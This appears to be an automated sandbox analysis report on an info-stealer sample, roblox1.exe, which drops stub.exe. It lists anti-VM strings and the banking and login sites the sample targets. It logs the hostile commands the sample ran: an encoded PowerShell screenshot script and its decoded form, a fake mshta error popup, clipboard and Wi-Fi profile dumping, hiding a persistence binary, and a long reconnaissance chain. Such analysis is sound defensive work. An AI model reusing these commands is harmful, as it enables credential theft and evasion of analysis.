Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: asandboxacuckooavmavirtualaqemuavboxaxenanodeuAntiVM.CheckHostNameT
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V Data Exchange Service
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V Guest Shutdown Service
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940721109.00000213BE12E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940139383.00000213BE111000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V Guest Service Interface
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vmsrvc.exe
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vboxservice.exe
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvmusrvc.exe
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vboxtray.exe
Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: j2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmU
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: discord.comVMware20,11696494690f
Source: stub.exe, 00000003.00000002.1949761469.00000213BF5B4000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: Hyper-VsizeEndCentDir
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: outlook.office.comVMware20,11696494690s
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vmwaretray.exe
Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uqemu-ga.exe
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvboxservice.exe
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvmtoolsd.exe
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvmsrvc.exe
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vmtoolsd.exe
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: cvmware
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvmwaretray.exe
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V Remote Desktop Virtualization Service
Source: stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SERVICE_NAME: vmicheartbeat
Source: stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SERVICE_NAME: vmicvss
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: zJVSk/BwJVmcIGfE7vmLV2H0knZ9P4SNVbfo5azV8fUZVqZa+5Acr5Pr5RzUZ5dd
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SERVICE_NAME: vmicshutdown
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: cVMware
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: dev.azure.comVMware20,11696494690j
Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvboxtray.exe
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uwmic path Win32_ComputerSystem get ManufacturercVMwarecvmwareuAntiVM.CheckHypervisoraFakeErrorT
Source: C:\Windows\System32\wbem\WMIC.exe; Process information queried: ProcessInformation
Source: C:\Windows\System32\tasklist.exe; Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe; Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe; Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe; Process token adjusted: Debug
Source: C:\Windows\System32\NETSTAT.EXE; Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                  Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded [Reflection.Assembly]::LoadWithPartialName("System.Drawing")function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose()}$bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080)$path = (Get-Item .).FullName+"\screenshot.png"screenshot $bounds $path
                  Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded [Reflection.Assembly]::LoadWithPartialName("System.Drawing")function screenshot([Drawing.Rectangle]$bounds, $path) { $bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height $graphics = [Drawing.Graphics]::FromImage($bmp) $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) $bmp.Save($path) $graphics.Dispose() $bmp.Dispose()}$bounds = [Drawing.Rectangle]::FromLTRB(0, 0, 1920, 1080)$path = (Get-Item .).FullName+"\screenshot.png"screenshot $bounds $path
                  Source: C:\Users\user\Desktop\roblox1.exe Process created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe C:\Users\user\Desktop\roblox1.exe
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe""
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\HOSTNAME.EXE hostname
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\query.exe query user
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net localgroup administrators
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user guest
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /svc
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ROUTE.EXE route print
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query type= service state= all
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh firewall show config
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                  Source: C:\Windows\System32\query.exe Process created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                  Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                  Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                  Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                  Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand 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"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand 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
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand 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"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand 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
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe Queries volume information: C:\Users\user\Desktop VolumeInformation
